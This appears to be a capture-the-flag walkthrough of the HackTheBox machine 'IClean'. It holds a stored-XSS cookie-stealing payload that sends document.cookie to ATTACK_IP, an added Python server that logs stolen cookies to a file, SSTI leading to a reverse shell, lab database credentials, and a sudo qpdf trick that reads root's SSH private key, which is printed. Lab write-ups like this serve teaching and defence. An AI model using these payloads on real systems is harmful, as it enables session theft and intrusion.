sudo nmap -Pn -A 10.10.11.12
echo "10.10.11.12 iclean.htb" | sudo tee -a /etc/hosts
When I navigated to http://iclean.htb it redirected to http://capiclean.htb, so I added that hostname to /etc/hosts as well and accessed it:
echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://capiclean.htb/FUZZ" --hc 404 --hl 348
I found a /quote directory, let's have a look.
I fired up Burp Suite, captured the requests and tested various input vectors and payloads in the quote form. The service parameter looked like a candidate for stored (blind) XSS: whatever is submitted there is not shown back to us immediately, but it is rendered later on the staff side, so a payload would fire in someone else's browser. A cookie-stealing payload is the quickest way to confirm that.
First I started a Python HTTP server to receive the callback:
python3 -m http.server 1234
Then I put the payload below in the service parameter, URL-encoded it in Burp (Ctrl+U) and sent the request.
<img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>
After some time a request came in to my listener carrying the cookie. Yooo!
Let's store this cookie with Cookie-Editor and access /dashboard.
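The plain `python3 -m http.server` only shows the raw request line in its access log. As an added example (not code from the original writeup), here is a small stdlib-only replacement listener that decodes the path the payload requests, `http://ATTACK_IP:1234/` + `document.cookie`, splits it into cookie name/value pairs and appends them to a file. The port matches the writeup; the output file name and the sample path in the test are my assumptions.

```python
# Added example, not from the original writeup: a cookie catcher for the
# blind-XSS payload  <img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>
# The victim's browser requests /<document.cookie>, URL-encoding spaces etc.,
# so the cookie string lives in the request path of the incoming GET.
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

LISTEN_PORT = 1234          # same port as the writeup's listener
LOOT_FILE = "cookies.txt"   # assumed output file name


def cookies_from_path(path: str) -> dict:
    """Parse '/name=value;%20name2=value2' (what fetch() sends) into a dict.

    document.cookie is 'name=value; name2=value2'; decode the percent-encoding
    first, then split on ';' and '='. Paths without '=' (e.g. /favicon.ico)
    yield an empty dict instead of junk entries.
    """
    raw = unquote(path.lstrip("/"))
    pairs = {}
    for chunk in raw.split(";"):
        chunk = chunk.strip()
        if not chunk or "=" not in chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs[name.strip()] = value.strip()
    return pairs


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = cookies_from_path(self.path)
        with open(LOOT_FILE, "a") as fh:
            for name, value in cookies.items():
                fh.write(f"{self.client_address[0]} {name}={value}\n")
        print(f"[+] {self.client_address[0]} -> {cookies or 'no cookie in path'}")
        # Answer 200 with an empty body so the victim-side fetch() completes quietly.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # suppress the default access log; we print our own [+] lines


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else LISTEN_PORT
    print(f"[*] cookie catcher listening on 0.0.0.0:{port}")
    HTTPServer(("0.0.0.0", port), CookieCatcher).serve_forever()
```

Run it as `python3 catcher.py 1234` in place of the http.server module and replace ATTACK_IP in the payload with your tun0 address. The whole technique depends on the session cookie being readable from JavaScript; had the application set it with the HttpOnly flag, `document.cookie` would not have contained it and the callback would have arrived empty.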
Visit http://capiclean.htb/InvoiceGenerator and fill in the form with arbitrary values to generate an invoice ID. The ID generated here was 3873147880.
Then visit http://capiclean.htb/QRGenerator, enter that ID, and a QR code image link is generated.
Let's use Burp Suite to capture the requests.
Among them is a POST request to /QRGenerator carrying the generated link in a qr_link parameter. Since this is a Flask application, the templating engine behind it is Jinja2, so a parameter that ends up inside a rendered template is a likely candidate for Server-Side Template Injection (SSTI).
To test it I put the basic arithmetic probe payload in the qr_link parameter, and boom, the response came back containing 49: the template engine evaluated the expression server-side.
I then tried to escalate this to Remote Code Execution (RCE), but the typical Jinja2 SSTI payload was ineffective, which points to some filtering of the usual building blocks. This article helped me find a bypass payload:
https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/
So first I started a netcat listener:
nc -nlvp 4444
Then I put the reverse-shell payload in the qr_link parameter, URL-encoded it in Burp (Ctrl+U) and sent the request.
We obtain a shell as www-data.
After traversing directories and examining files, I found the app.py
file, which contains hard-coded MySQL database credentials. With these I was able to get into the database.
db_config = {
'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'
}
Before accessing MySQL, let's upgrade the shell to a fully interactive TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
Now let's access MySQL, entering the password from app.py at the prompt:
mysql -h 127.0.0.1 -u iclean -p capiclean
show tables;
select * from users;
The users table holds password hashes. Let's use CrackStation
to crack them: https://crackstation.net/
One of them cracks, so let's use that credential to switch to the user consuela and check her sudo rights:
su consuela
sudo -l
So consuela can run /usr/bin/qpdf as root via sudo. After a search I found the documentation:
https://qpdf.readthedocs.io/en/stable/cli.html
The idea: use --empty
to start from an empty document instead of an input PDF, --qdf
to write the output in QDF mode (uncompressed, human-readable streams), and --add-attachment
to embed an arbitrary file in the PDF. Because sudo runs qpdf as root, the file it reads can be root's id_rsa
, and since QDF mode leaves the attachment stream uncompressed, the key ends up readable in the generated id_rsa.pdf
.
let’s run this command:
sudo /usr/bin/qpdf --empty --qdf --add-attachment /root/.ssh/id_rsa -- id_rsa.pdf
It generated id_rsa.pdf; let's cat that.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Let's create an id_rsa
file with the key, restrict its permissions with chmod 600 id_rsa
(ssh refuses keys that are readable by others), and connect as root using the -i
option to specify the private key. Despite the file name, the embedded key is actually an ECDSA (nistp256) key, which is fine: ssh does not care what the file is called.